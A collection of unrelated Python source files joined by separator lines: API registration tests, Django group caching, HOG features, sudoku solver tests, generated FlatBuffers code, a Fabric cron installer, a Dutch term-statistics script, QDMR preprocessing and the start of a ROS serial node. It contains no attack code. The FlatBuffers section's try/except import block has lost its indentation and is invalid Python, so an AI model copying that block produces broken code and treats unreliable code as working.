          'isitfitapi_body': {
          }
        }
        am = MockApiManRequest(response)
        # exception
        with pytest.raises(IsitfitCliError) as e:
            am.register()
    @mock_sts
    def test_register_ok(self, mocker, MockApiManRequest):
        # Complete, well-formed registration body: no exception expected.
        response = {
          'isitfitapi_status': {'code': 'ok', 'description': 'foo'},
          'isitfitapi_body': {
            's3_arn': 'foo',
            'sqs_url': 'foo',
            'role_arn': '01234567890123456789',
            's3_bucketName': 'foo',
            's3_keyPrefix': 'foo',
          }
        }
        am = MockApiManRequest(response)
        # no exception
        am.register()
        assert True
|
from django.contrib.auth.models import (User,Group)
# Cache well-known groups as attributes on the Group class, falling back to
# None when the group cannot be fetched (missing row, database not yet
# migrated, etc.).
for attr, name in (("FMSB", "Fire Management Services Branch"),):
    try:
        setattr(Group, attr, Group.objects.get(name=name))
    except Exception:
        # BUG FIX: this was `finally:`, which ran unconditionally and
        # overwrote the freshly fetched group with None in every case.
        setattr(Group, attr, None)
|
from typing import List
import cv2
import numpy as np
def compute_features(hog_descriptor: cv2.HOGDescriptor, imgs: List[np.ndarray]) -> List[np.ndarray]:
    """
    Compute HOG features for a list of images.

    Each image is converted to grayscale, resized to 64x64 pixels and run
    through the given HOG descriptor.

    Parameters
    ----------
    hog_descriptor : cv2.HOGDescriptor
        The HOG descriptor to use for computing features.
    imgs : List[np.ndarray]
        List of images to compute features for.

    Returns
    -------
    features : List[np.ndarray]
        List of HOG features vector for each image.
    """
    def _describe(image: np.ndarray) -> np.ndarray:
        # Grayscale + fixed-size input keeps feature vectors comparable.
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        resized = cv2.resize(gray, (64, 64))
        return hog_descriptor.compute(resized)

    return [_describe(img) for img in imgs]
|
#!/usr/bin/python3
import unittest
from context import *
from helpers import *
class TestBoard(unittest.TestCase):
    """Unit tests for Board reduction logic (fixtures loaded via helpers)."""
    def assertCell(self, values, actual):
        # Compare a cell's candidate set against values given in display form.
        expected = valuesFromDisplay( values )
        self.assertEqual(expected, actual)
    def test_reduceCell(self):
        setup = Board(parseCells(readFixture('2007-02-18.sdk')))
        # Reducing cell 0 removes five candidates, leaving {1, 3, 8, 9}.
        self.assertEqual(5, setup.reduceCell(0))
        self.assertCell([1, 3, 8, 9, ], setup._cells[0] )
    def test_reduceRegion(self):
        setup = Board(parseCells(readFixture('2007-02-18.sdk')))
        # After reducing all the cells, there are three
        # regions that can be reduced
        for c in range(len(setup._cells)): setup.reduceCell(c)
        self.assertEqual(1, setup.reduceRegion(iRows[7]))
        self.assertEqual(1, setup.reduceRegion(iCols[2]))
        self.assertEqual(2, setup.reduceRegion(iBoxes[6]))
        self.assertCell([3,], setup._cells[8] )
    def test_reduce(self):
        setup = Board(parseCells(readFixture('2007-02-18.sdk')))
        setup.reduce()
        # This board has a branch point in cell 5
        self.assertEqual(5, setup._shortest)
        self.assertEqual([0, 1, ], setup._cells[setup._shortest])
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: Example
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class StructOfStructs(object):
    """FlatBuffers accessor for a 20-byte struct nesting three structs at
    fixed byte offsets: A at +0, B at +8, C at +12. (Generated code.)"""
    __slots__ = ['_tab']

    @classmethod
    def SizeOf(cls):
        # Total packed size of the struct in bytes.
        return 20

    # StructOfStructs
    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)

    # StructOfStructs
    def A(self, obj):
        # Initialize obj in place over the A field's bytes and return it.
        obj.Init(self._tab.Bytes, self._tab.Pos + 0)
        return obj

    # StructOfStructs
    def B(self, obj):
        # Initialize obj in place over the B field's bytes and return it.
        obj.Init(self._tab.Bytes, self._tab.Pos + 8)
        return obj

    # StructOfStructs
    def C(self, obj):
        # Initialize obj in place over the C field's bytes and return it.
        obj.Init(self._tab.Bytes, self._tab.Pos + 12)
        return obj
def CreateStructOfStructs(builder, a_id, a_distance, b_a, b_b, c_id, c_distance):
    # Generated code: fields are prepended in reverse order (C, then B with
    # one byte of padding, then A) because the FlatBuffers builder writes
    # back-to-front.
    builder.Prep(4, 20)
    builder.Prep(4, 8)
    builder.PrependUint32(c_distance)
    builder.PrependUint32(c_id)
    builder.Prep(2, 4)
    builder.Pad(1)
    builder.PrependInt8(b_b)
    builder.PrependInt16(b_a)
    builder.Prep(4, 8)
    builder.PrependUint32(a_distance)
    builder.PrependUint32(a_id)
    return builder.Offset()
import MyGame.Example.Ability
import MyGame.Example.Test
try:
from typing import Optional
except:
pass
class StructOfStructsT(object):
    """Mutable object-API ("T") companion for StructOfStructs. (Generated.)"""
    # StructOfStructsT
    def __init__(self):
        self.a = None  # type: Optional[MyGame.Example.Ability.AbilityT]
        self.b = None  # type: Optional[MyGame.Example.Test.TestT]
        self.c = None  # type: Optional[MyGame.Example.Ability.AbilityT]

    @classmethod
    def InitFromBuf(cls, buf, pos):
        structOfStructs = StructOfStructs()
        structOfStructs.Init(buf, pos)
        return cls.InitFromObj(structOfStructs)

    @classmethod
    def InitFromObj(cls, structOfStructs):
        x = StructOfStructsT()
        x._UnPack(structOfStructs)
        return x

    # StructOfStructsT
    def _UnPack(self, structOfStructs):
        if structOfStructs is None:
            return
        # Struct accessors return the object passed in, so these conditions
        # are always true for a non-None source.
        if structOfStructs.A(MyGame.Example.Ability.Ability()) is not None:
            self.a = MyGame.Example.Ability.AbilityT.InitFromObj(structOfStructs.A(MyGame.Example.Ability.Ability()))
        if structOfStructs.B(MyGame.Example.Test.Test()) is not None:
            self.b = MyGame.Example.Test.TestT.InitFromObj(structOfStructs.B(MyGame.Example.Test.Test()))
        if structOfStructs.C(MyGame.Example.Ability.Ability()) is not None:
            self.c = MyGame.Example.Ability.AbilityT.InitFromObj(structOfStructs.C(MyGame.Example.Ability.Ability()))

    # StructOfStructsT
    def Pack(self, builder):
        # Raises AttributeError if a, b or c is still None.
        return CreateStructOfStructs(builder, self.a.id, self.a.distance, self.b.a, self.b.b, self.c.id, self.c.distance)
|
"""
Cron Blueprint
==============
This blueprint has no settings.
Templates are handled as crontabs and should be named after related user.
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.cron
"""
import os
from fabric.decorators import task
from refabric.context_managers import sudo, silent
from refabric.contrib import blueprints
from refabric.operations import run
from refabric.utils import info
from blues.application.providers.base import get_project_info
from blues import debian
__all__ = ['configure']
blueprint = blueprints.get(__name__)
@task
def configure():
    """
    Install crontab per template (i.e. user)

    Uploads the blueprint's templates into a temporary directory and installs
    each uploaded file as the crontab of the user it is named after.
    """
    with sudo(), silent():
        # NOTE(review): mode=555 is a decimal int (== 0o1055); this likely
        # meant octal 0o555 or the string '555' — confirm against
        # debian.temporary_dir's expected argument.
        with debian.temporary_dir(mode=555) as temp_dir:
            updates = blueprint.upload('./', temp_dir,
                                       context=get_project_info())
            for update in updates:
                # Template filename == target user name.
                user = os.path.basename(update)
                info('Installing new crontab for {}...', user)
                run('crontab -u {} {}'.format(user, os.path.join(temp_dir, user)))
|
# Module-level registry list; presumably populated by other modules at import
# time — confirm against callers.
all_apis = []
|
"""
P(response|context cluster presence) for a given sample, based on sample
majority vote scores.
"""
import json
import os
import re
import typing
from collections import Counter, defaultdict
import pandas as pd
from scipy.stats import binom_test
def main():
    """Compute P(response | context-cluster presence) for a sample, based on
    sample majority-vote scores, and write per-cluster statistics to CSV.

    Bug fix: ``Series.iteritems()`` was removed in pandas 2.0; replaced with
    the equivalent ``Series.items()`` (available in all supported versions).
    """
    # ------
    # cluster of interest: to be iterated over and determine significance
    # = {'label'|str|:(hash_level|int| : set of context tokens|list|}
    # ! ENSURE A TOKENS ARE UNIQUE TO LABELS
    # ------
    sav_suffix = "health_14_341652"
    clusters_of_interest = {'health_14_341652':(8, set(["joden", "niet-christen", "profeet", "romein", "christen", "evangelie", "christus", "dienaar", "gods", "sect", "god", "ood", "huwen", "allah", "voorvader", "bedienaar", "heilig", "boeddhistisch", "roemrijk", "woord", "heere", "bidden", "heilige", "geloofsgenoot", "troost", "geloofs", "medebroeder", "herder", "bewonderaar", "vaderlandsch", "geslacht", "goddelijk", "jezus", "adelijk", "brochure", "zegen", "gesneuvelde", "profetie", "nakomeling", "avontuurlijk", "heiligheid", "zalig", "godheid", "apostel", "genesis", "joodsch", "kruises", "confessie", "legende", "offerande", "afkomst", "kruise", "heerlijkheid", "gode", "belijden", "edele", "mythe", "kindor", "martelaar", "geloovlg", "heiden", "iong", "zegenen", "bekeering", "voorzienigheid", "secte", "zaligheid", "levenslicht", "belijdenis", "roemvol", "gevallene", "babel", "rechterstoel", "zondaar", "jongo", "almachtig", "voorouder", "zionisme", "triomf", "bijbelverhaal", "jesus", "gebod", "romeinen", "calvijn", "eerbiedig", "berinnering", "stervende", "bladzijde", "exodus", "valkenjacht", "weldoenster", "avontuur", "ziekbed", "belijder", "smeeken", "buddha", "bedroefd", "beminnen", "loovig", "andersdenkend", "geliefd", "salomo", "joodsche", "viouw", "godsrijk", "hemelschen", "missieland", "nageslacht", "allerhoogste", "roemruchtig", "legendarisch", "toovenaar", "heiligen", "grondvester", "marteldood", "fabel", "afkorten", "triomfantelijk", "stervensuur", "weldoener", "geloofsbelijdenis", "pupil", "juffer", "engel", "nakomelingschap", "apostelen", "bidd", "overlevering", "nari", "zion", "rabbi", "heiland", "baby", "gelovig", "rouwen", "zegening", "heidenen", "triomfator", "oods", "voorgeslacht", "heks", "farao", "zielenheil", "wederkomst", "verlosser", "goden", "grafschrift", "lauwer", "thora", "joods", "vereering", "troostwoord", "discipel", "sinai", 'gezegenden', 'onsterfelijk', 'heidenwereld', 'ontroerd', 'draak', 'christen-', 'wijsgeerig', 'openbaring',
    'verlossing', 'godin', 'glorie', 'eeuwigheid', 'mythologisch', 'satan', 'religieus', 'hemelsch', 'schepper', 'duivel', 'koran', 'vroom', 'opperwezen', 'vrijkopen', 'godsdienstig']))}
    # convert to hash of {'token':'label', }
    h = {token:label for label, (hash_level, s) in clusters_of_interest.items() for token in s}
    # ------
    # load data
    # ------
    with open("../data.csv", "r") as f:
        data = pd.read_csv(f)
    # remove all 'weet ik niet' and 'Onleesbare ...'
    data = data[
        data["response"].isin(["Omstreden naar huidige maatstaven", "Niet omstreden"])
    ]
    # case fold target_compound
    data["target_compound"] = data["target_compound"].str.lower()
    # get a series of text-analysed contexts by extract_id
    contexts: pd.Series = data.groupby(["extract_id"]).first().loc[:, "text_analysed"]
    # ------
    # load dataframe of | extract_id | label |
    # ------
    with open("../majority_vote/majority_vote.csv", "r") as f:
        majority_vote = pd.read_csv(f)
    majority_vote = majority_vote.set_index("extract_id")
    # ------
    # Construct extract id associations with cluster, and cluster's respective tokens
    # ------
    extracts_by_cluster = defaultdict(set)  # cluster_label|str| : set of extract ids present|list|
    flagged_contexts_by_cluster = defaultdict(Counter)  # cluster_label|str| : Counter({context_tokens: count of unique extract appears in})
    # FIX: Series.iteritems() was removed in pandas 2.0 — .items() is the
    # drop-in replacement with identical behavior.
    for extract_id, text in contexts.items():
        # iterate over context tokens
        seen_terms = set()
        for context_token in set(
            [
                t
                for s in text.split("<sent>")
                for t in s.split(" ")
                if t != "" and t != " "
            ]
        ):
            # add unseen terms (wrt., current extract) present in hashes to ...
            if context_token in h and context_token not in seen_terms:
                seen_terms.add(context_token)
                cluster_label = h[context_token]
                extracts_by_cluster[cluster_label].add(extract_id)  # each extract only associated once with an extract regardless of frequency
                # how many extracts a clusters' context tokens appears
                flagged_contexts_by_cluster[cluster_label][context_token] += 1
    # build target_words_by_context_cluster = {cluster_label|str|: associated target words|list|}
    target_words_by_id = (
        data.groupby(["extract_id"]).first().loc[:, "target_compound"]
    )
    target_words_by_context_cluster = defaultdict(Counter)
    for cluster_label, extract_ids in extracts_by_cluster.items():
        for extract_id in extract_ids:
            target = target_words_by_id.at[extract_id]
            target_words_by_context_cluster[cluster_label][target] += 1
    # ------
    # build df of statistics wrt., selected clusters
    # ------
    stats = defaultdict(list)
    for cluster_label, extract_ids in extracts_by_cluster.items():
        votes = [
            majority_vote.at[extract_id, "label"] for extract_id in extract_ids
        ]  # votes associated with all context clusters
        stats["cluster"].append(cluster_label)
        stats["num_corresponding_extracts"].append(len(votes))
        count_c = sum([1 for v in votes if v == 1])
        count_n = sum([1 for v in votes if v == 0])
        count_u = sum([1 for v in votes if v == 0.5])
        count = len(votes)
        # attribute point estimates and p-values
        # NOTE(review): scipy.stats.binom_test is deprecated (removed in
        # scipy 1.12) in favor of binomtest(...).pvalue — migrate when the
        # pinned scipy version allows.
        stats["proportion_with_contentious"].append((count_c) / (count))
        stats["contentious_p_value"].append(
            binom_test(count_c, count, p=0.183, alternative="greater")
        )
        stats["proportion_with_non_contentious"].append((count_n) / (count))
        stats["non_contentious_p_value"].append(
            binom_test(count_n, count, p=0.796, alternative="greater")
        )
        stats["proportion_with_no_majority"].append((count_u) / (count))
        # attibute number of target words and number of instances
        targets = target_words_by_context_cluster[cluster_label]
        target_string = ", ".join(
            [t + f"({count})" for t, count in targets.items()]
        )
        stats["targets_count"].append(sum([1 for t, c in targets.items()]))
        stats["targets"].append(target_string)
        # attibute distribution of context words
        stats["context_tokens_occuring"].append(
            ", ".join(
                [str(c) for c in flagged_contexts_by_cluster[cluster_label].items()]
            )
        )
        # context words - for cut and paste translate
        stats["context_tokens_occuring2"].append(
            ", ".join([i for i, j in flagged_contexts_by_cluster[cluster_label].items()])
        )
    # save as a dataframe
    stats = pd.DataFrame.from_dict(stats)
    sav = f"selected/stats_{sav_suffix}.csv"
    os.makedirs(os.path.dirname(sav), exist_ok=True)
    with open(sav, "w") as f:
        stats.to_csv(f)
def gen_dir(dir: typing.Optional[str] = None, *, pattern: str = ".+") -> typing.Generator:
    """Yield names of files in a directory, optionally matching a pattern.

    Fixes: (1) the docstring claimed absolute paths were returned, but bare
    filenames are yielded (join with *dir* for full paths); (2) the previous
    default ``dir=os.getcwd()`` was evaluated once at import time, so later
    working-directory changes were ignored — the default is now resolved at
    call time.

    Args:
        dir (str): directory to scan [default: current working dir at call time]
        pattern (str): filename regex to match against [default: any file]
    """
    if dir is None:
        dir = os.getcwd()
    for filename in os.listdir(dir):
        if re.search(pattern, filename):
            yield filename
# Script entry point.
if __name__ == "__main__":
    main()
|
from models.flow.glow.glow import Glow
|
from .menu_item import MenuItemAdmin # noqa
|
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
from spdm.common.SpObject import SpObject
# Register file-suffix -> plugin-class associations on SpObject so data files
# are dispatched to the matching plugin implementation by extension.
SpObject.association.update({
    ".data.file.table": ".data.file.PluginTable",
    ".data.file.bin": ".data.file.PluginBinary",
    ".data.file.h5": ".data.file.PluginHDF5",
    ".data.file.hdf5": ".data.file.PluginHDF5",
    ".data.file.nc": ".data.file.PluginNetCDF",
    ".data.file.netcdf": ".data.file.PluginNetCDF",
    ".data.file.namelist": ".data.file.PluginNamelist",
    ".data.file.nml": ".data.file.PluginNamelist",
    ".data.file.xml": ".data.file.PluginXML",
    ".data.file.json": ".data.file.PluginJSON",
    ".data.file.yaml": ".data.file.PluginYAML",
    ".data.file.txt": ".data.file.PluginTXT",
    ".data.file.csv": ".data.file.PluginCSV",
    ".data.file.numpy": ".data.file.PluginNumPy",
    ".data.file.gfile": ".data.file.PluginGEQdsk",
    ".data.file.geqdsk": ".data.file.PluginGEQdsk",
    # MDSplus files are handled by the database plugin's file class.
    ".data.file.mds": ".data.db.PluginMDSplus#MDSplusFile",
    ".data.file.mdsplus": ".data.db.PluginMDSplus#MDSplusFile",

    # ".data.file.mds": ".data.db.MDSplus#MDSplusDocument",
    # ".data.file.mdsplus": ".data.db.MDSplus#MDSplusDocument",
    # ".data.file.gfile": ".data.file.PluginGEQdsk",
    # ".data.file.geqdsk": ".data.file.PluginGEQdsk",
    # "db.imas":".spdm.plugins.data.db.IMAS#IMASDocument",
})
|
"""Rule-based preprocessing of Break QDMR's and determining their operation types."""
import sys
import argparse
import collections
import logging
import math
import os
import random
import six
from tqdm import tqdm, trange
import ujson as json
import time, pickle, re, jsonlines
from copy import deepcopy
from functools import partial
from collections import Counter
import numpy as np
import pandas as pd
from utils import read_file, write_file, get_ent, dirname
from break_utils import compare
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
                    datefmt = '%m/%d/%Y %H:%M:%S',
                    level = logging.INFO)
logger = logging.getLogger(__name__)

# Separator between QDMR steps in the raw decomposition string.
DELIMITER = ';'
# Prefix marking a reference to a previous step, e.g. "#2".
REF = '#'
# Sentinel embedded in FILTER steps to carry the operand step reference.
FLTR_STR = '@@@FILTER_WITH@@@'
# ---------- rule-based identification of the qdmr ops given the decomposition steps -----------
class QDMROperation:
    """Enumeration (plain ints via range) of the QDMR operator types."""
    FIND, SELECT, FILTER, PROJECT, AGGREGATE, GROUP, SUPERLATIVE, COMPARATIVE, UNION, \
    INTERSECTION, DISCARD, SORT, BOOLEAN, ARITHMETIC, COMPARISON, NONE = range(16)
def op_name(qdmr_op):
    """Return the human-readable name (str) of a QDMROperation value.

    Bug fix: the ``.get`` default was ``QDMROperation.NONE`` (an int), so an
    unknown operation value returned an int where every other path returns a
    name string. Unknown values now fall back to the string ``'NONE'``.
    """
    return {
        QDMROperation.FIND : 'FIND',
        QDMROperation.SELECT : 'SELECT',
        QDMROperation.FILTER : 'FILTER',
        QDMROperation.PROJECT : 'PROJECT',
        QDMROperation.AGGREGATE : 'AGGREGATE',
        QDMROperation.GROUP : 'GROUP',
        QDMROperation.SUPERLATIVE : 'SUPERLATIVE',
        QDMROperation.COMPARATIVE : 'COMPARATIVE',
        QDMROperation.UNION : 'UNION',
        QDMROperation.INTERSECTION : 'INTERSECTION',
        QDMROperation.DISCARD : 'DISCARD',
        QDMROperation.SORT : 'SORT',
        QDMROperation.BOOLEAN : 'BOOLEAN',
        QDMROperation.ARITHMETIC : 'ARITHMETIC',
        QDMROperation.COMPARISON : 'COMPARISON',
        QDMROperation.NONE : 'NONE'
    }.get(qdmr_op, 'NONE')
def step_type(step, is_high_level):
    """
    Maps a single QDMR step into relevant its operator type

    Parameters
    ----------
    step : str
        String representation a single QDMR step
    is_high_level : bool
        Flag whether or not we include the high level FIND steps,
        associated with RC datasets

    Returns
    -------
    QDMROperation
        returns the type of QDMR operation of the step

    Note
    ----
    The checks below are order-dependent: earlier (more specific) rules take
    precedence over later, more generic ones.
    """
    step = step.lower()
    references = extract_references(step)
    if any([step.lower().startswith(x) for x in ['if ', 'is ', 'are ']]):
        # BOOLEAN step - starts with either 'if', 'is', 'are'
        return QDMROperation.BOOLEAN
    if len(references) == 0:
        # SELECT step - no references to previous steps
        return QDMROperation.SELECT
    # Discrete QDMR step types:
    if len(references) == 1:
        # AGGREGATION step - aggregation applied to one reference
        # NOTE(review): the trailing space in 'mean ' appears deliberate, to
        # avoid matching words that merely start with "mean" — confirm.
        aggregators = ['number of', 'highest', 'largest', 'lowest', 'smallest', 'maximum', 'minimum', \
                       'max', 'min', 'sum', 'total', 'average', 'avg', 'mean ']
        for aggr in aggregators:
            aggr_ref = aggr + ' #'
            aggr_of_ref = aggr + ' of #'
            if (aggr_ref in step) or (aggr_of_ref in step):
                return QDMROperation.AGGREGATE
    if 'for each' in step:
        # GROUP step - contains term 'for each'
        return QDMROperation.GROUP
    if len(references) >= 2 and len(references) <= 3 and ('where' in step):
        # COMPARATIVE step - '#1 where #2 is at most three'
        comparatives = ['same as', 'higher than', 'larger than', 'smaller than', 'lower than',\
                        'more', 'less', 'at least', 'at most', 'equal', 'is', 'are', 'was', 'contain', \
                        'include', 'has', 'have', 'end with', 'start with', 'ends with', \
                        'starts with', 'begin']
        for comp in comparatives:
            if comp in step:
                return QDMROperation.COMPARATIVE
    if step.startswith('#') and ('where' in step) and len(references) == 2:
        # SUPERLATIVE step - '#1 where #2 is highest/lowest'
        superlatives = ['highest', 'largest', 'most', 'smallest', 'lowest', 'smallest', 'least', \
                        'longest', 'shortest', 'biggest']
        for s in superlatives:
            if s in step:
                return QDMROperation.SUPERLATIVE
    if len(references) > 1:
        # UNION step - '#1, #2, #3, #4' / '#1 or #2' / '#1 and #2'
        is_union = re.search("^[#\s]+[and0-9#or,\s]+$", step)
        if is_union:
            return QDMROperation.UNION
    if len(references) > 1 and ('both' in step) and ('and' in step):
        # INTERSECTION step - 'both #1 and #2'
        return QDMROperation.INTERSECTION
    if (len(references) >= 1) and (len(references) <= 2) and \
       (re.search("^[#]+[0-9]+[\s]+", step) or re.search("[#]+[0-9]+$", step)) and \
       ('besides' in step or 'not in' in step):
        # DISCARD step - '#2 besides X'
        return QDMROperation.DISCARD
    if ('sorted by' in step) or ('order by' in step) or ('ordered by' in step):
        # SORT step - '#1 ordered/sorted by #2'
        return QDMROperation.SORT
    if step.lower().startswith('which') and len(references) > 1:
        # COMPARISON step - 'which is better A or B or C'
        return QDMROperation.COMPARISON
    if len(references) >= 1 and ('and' in step or ',' in step):
        # ARITHMETIC step - starts with arithmetic operation
        arithmetics = ['sum', 'difference', 'multiplication', 'division']
        for a in arithmetics:
            if step.startswith(a) or step.startswith('the ' + a):
                return QDMROperation.ARITHMETIC
    # Non-discrete QDMR step types:
    if len(references) == 1 and re.search("[\s]+[#]+[0-9\s]+", step):
        # PROJECT step - 'property of #2'
        return QDMROperation.PROJECT
    if len(references) == 1 and step.startswith("#"):
        # FILTER step - '#2 [condition]'
        return QDMROperation.FILTER
    if len(references) > 1 and step.startswith("#"):
        # FILTER step - '#2 [relation] #3'
        return QDMROperation.FILTER
    if is_high_level:
        return QDMROperation.FIND
    return QDMROperation.NONE
def extract_references(step):
    """Extract the indices of previous steps referenced by a QDMR step.

    Parameters
    ----------
    step : str
        String representation of a QDMR step.

    Returns
    -------
    list
        List of ints, one per reference marker (e.g. '#2') found in the step.
    """
    # A bare '# ' is not a real reference marker -- neutralize it first,
    # then normalize ', ' separators to ' or ' so references split cleanly.
    cleaned = step.replace("# ", "hashtag ").replace(", ", " or ")
    refs = []
    for chunk in cleaned.split(REF)[1:]:
        if len(chunk) > 1:
            # The reference index is the first whitespace-delimited token.
            refs.append(int(chunk.split()[0]))
        elif len(chunk) == 1:
            # Trailing single-character chunk is the index itself.
            refs.append(int(chunk))
    return refs
# ------- preparing the QDMRs based on identified ops -------------
class QDMR:
    """Container for a single QDMR decomposition.

    Post-processes FILTER steps so that each filter's operand step index is
    folded into its op-type label (e.g. 'FILTER' -> 'FILTER_#2'), which is
    convenient for downstream tasks.

    Attributes:
        question_id: identifier of the question this decomposition belongs to.
        steps: processed step strings (FILTER operand suffix stripped).
        op_types: op labels, with '_#k' appended for FILTER steps.
    """

    def __init__(self, question_id, steps, op_types=None):
        '''Further processing FILTER steps for convenience during downstream tasks.
        '''
        # Derive op types from the step text when the caller supplies none.
        op_types = op_types if op_types else [get_op_type(step) for step in steps]
        assert len(steps) == len(op_types) and len(steps)
        _steps, _op_types = [], []
        for i_s, (step, op) in enumerate(zip(steps, op_types)):
            if FLTR_STR in step:
                # append the index of the step wrt which the filter step is applied
                if step.count(FLTR_STR) > 1:  # hack for rule-based
                    # removing the starting FILTER string
                    step = step[len(FLTR_STR):].strip()
                # NOTE(review): the `print(...)` message expressions below
                # evaluate (and print) only when the assert fails; the assert
                # message itself is then None.
                assert step.count(FLTR_STR) == 1, print(step)
                # --------------
                # if op != 'FILTER':
                #     print(f'{i_s} : "{step}" : changing identified op {op} --> FILTER')
                #     op = 'FILTER'
                # ----------------
                assert op == 'FILTER', print(op_types, op, step, '\n***********')
                idx = step.index(FLTR_STR)
                # extract the filter string with the operand step idx
                ph = step[idx + len(FLTR_STR):].strip()
                # Operand must be a reference '#1'..'#6' to an earlier step.
                assert ph in [f'#{n}' for n in range(1,7)], print(step, ph)
                assert int(ph[1:]) <= i_s, print(steps, op_types, ph)
                _steps.append(step[:idx].strip())
                _op_types.append(op+str(f'_{ph}'))
            else:
                _steps.append(step)
                _op_types.append(op)
        self.question_id = question_id
        self.steps = _steps
        self.op_types = _op_types
def parse_decomposition(qdmr):
    """Split a QDMR string into an ordered list of step strings.

    Parameters
    ----------
    qdmr : str
        String representation of the QDMR.

    Returns
    -------
    list
        Ordered list of QDMR steps, each with its leading 'return'
        token removed.
    """
    steps = []
    for raw_step in qdmr.split(DELIMITER):
        tokens = raw_step.strip().split()
        # Drop the leading 'return' token, then re-join the remainder
        # with single spaces.
        steps.append(' '.join(tok.strip() for tok in tokens[1:] if tok.strip()))
    return steps
def prepare_decompositions(csv_path):
    """Reads file of QDMR strings into list of decompositions

    Parameters
    ----------
    csv_path : str
        Path to the processed break .csv; expects 'id', 'steps' and
        'operators' columns, the latter two DELIMITER-separated.

    Returns
    -------
    list
        Returns list of QDMR objects
    """
    rows = pd.read_csv(csv_path, encoding='utf8').to_dict(orient='records')
    qdmrs = []
    for i, r in enumerate(rows):
        # Steps and their op labels are parallel DELIMITER-separated lists.
        given_steps = [x.strip() for x in r['steps'].strip().split(DELIMITER)]
        given_types = [x.strip() for x in r['operators'].strip().split(DELIMITER)]
        qdmr = QDMR(r['id'], given_steps, given_types)
        qdmrs.append(qdmr)
    return qdmrs
def get_op_type(step):
    """Map a QDMR step to its string operator label.

    FIND/PROJECT collapse to 'BRIDGE'; a two-reference BOOLEAN step gets a
    suffix describing its flavor (_AND/_OR/_EQ/_NEQ).  Any other operator
    falls through and yields False (kept to match original behavior).
    """
    op = step_type(step, True)
    if op in (QDMROperation.FIND, QDMROperation.PROJECT):
        return "BRIDGE"
    if op == QDMROperation.BOOLEAN:
        refs = extract_references(step)
        if len(refs) != 2:
            return op_name(op)
        if (' both ' in step) and (' and ' in step):
            return '%s_AND' % op_name(op)
        if (' either ' in step) and (' or ' in step):
            return '%s_OR' % op_name(op)
        if ' same as ' in step:
            return '%s_EQ' % op_name(op)
        if ' different ' in step:
            return '%s_NEQ' % op_name(op)
        # Two references but no recognizable boolean flavor.
        return op_name(op)
    # NOTE(review): non-BRIDGE, non-BOOLEAN ops yield False here
    # (original behavior preserved) -- confirm callers expect that.
    return False
def print_op_stats(qdmr_list):
    """Print per-operator coverage stats for a list of QDMR objects."""
    has_op_counter = Counter()
    all_ops_counter = Counter()
    for qdmr in qdmr_list:
        # Count each distinct op at most once per QDMR for coverage stats.
        has_op_counter.update(set(qdmr.op_types))
        # Count full op-type sequences (stringified) for pattern stats.
        all_ops_counter.update({str(qdmr.op_types)})
    total = len(qdmr_list)
    print(f"Num of QDMRs: {total}")
    for op, cnt in has_op_counter.most_common():
        print(f"containing a {op} step: {cnt} , {round(cnt / total * 100, 2)}%")
    print("*" * 50)
    print('Most common op-sequences with a FILTER:')
    for key, count in all_ops_counter.most_common():
        if 'FILTER' in key:
            print(key, '%.2f%%' % (count * 100 / total))
def main():
    """CLI entry point: load a processed break csv, print op stats,
    and dump the QDMRs as jsonl next to the input file."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--processed_break_csv", default='data/qdmr_data/processed_data_hotpotqa_gold.csv',
                        type=str, help="path to the processed .csv of the break experiment (gold/predicted/rule-based).")
    parser.add_argument("--out_jsonl", default='qdmrs_hotpot_gold.jsonl',
                        type=str, help="the processed break .jsonl to be saved in same dir as input break file.")
    args = parser.parse_args()
    break_csv = args.processed_break_csv
    # process the QDMRs
    logging.info(f'processing {break_csv} ...')
    qdmrs = prepare_decompositions(break_csv)
    # operator statistics
    print_op_stats(qdmrs)
    out_path = f'{dirname(break_csv)}/{args.out_jsonl}'
    logging.info(f'saving the processed QDMRs to {out_path}')
    write_file([qdmr.__dict__ for qdmr in qdmrs], out_path)
# Script entry point; example invocations are listed in the string below.
if __name__ == "__main__":
    main()
'''
python prepare_break.py --processed_break_csv data/qdmr_data/processed_data_hotpotqa_gold.csv --out_jsonl qdmrs_hotpotqa_gold.jsonl
python prepare_break.py --processed_break_csv data/qdmr_data/processed_data_hotpotqa_copy_net.csv --out_jsonl qdmrs_hotpotqa_copy_net.jsonl
python prepare_break.py --processed_break_csv data/qdmr_data/processed_data_hotpotqa_rule_based.csv --out_jsonl qdmrs_hotpotqa_rule_based.jsonl
'''
|
#!/usr/bin/python
# NOTE: on Ubuntu 18.04, specifying /usr/bin/env python uses python 3,
# while specifying /usr/bin/python uses python 2.7. We need 2.7.
# serial_tx_fromtopic writes messages from a topic to the serial port.
# Usage is:
# rosrun spine_controller serial_tx_fromtopic device-name topic-name
# Right now, this subscriber node only works for messages of type Float32MultiArray,
# since that's what's used in the invkin_tx_totopic node.
# We're also doing a publisher here, so we can confirm what's echoed out to the serial.
# Imports:
import rospy
# because we need the command-line arguments
import sys
# and for the serial/usb/uart via pyserial:
import serial
# need to manipulate arrays
import numpy as np
# We'll also be echoing messages to a ros topic.
# There's a nice message spec: numpy_msg
from rospy.numpy_msg import numpy_msg
# but that needs to wrap around a standard message type.
# Seems that arrays are in the *MultiArray messages.
# We don't need 64 bits because the invkin output is only to a few decimal places
#from std_msgs.msg import Float32MultiArray
# Now we've got our own message type.
from spine_controller.msg import InvkinControlCommand
# also need to echo back a string of the formatted output to the serial port.
from std_msgs.msg import String
# Note: in order to do publishing within a callback, we need to pass around
# the publisher object, which is done much easier by making this a class.
class SerialTxFromTopic:
    """ROS node object that forwards inverse-kinematics control messages to a
    serial device (a PSoC microcontroller).

    Subscribes to 'invkin_tx_commands' (InvkinControlCommand messages),
    formats each message as a 'u <f1> <f2> ... <fn>\\n' command string,
    writes it to the serial port, and echoes the formatted string on the
    'serial_tx_echo' topic for debugging.
    """

    # The callback function here does all the heavy lifting.
    def serial_tx_callback(self, message):
        """Format one InvkinControlCommand and write it to the serial port.

        message: InvkinControlCommand whose 'invkin_control' field holds the
        per-cable control inputs (assumed meters, in [0, 1) -- see notes
        below; TODO confirm against the invkin publisher).
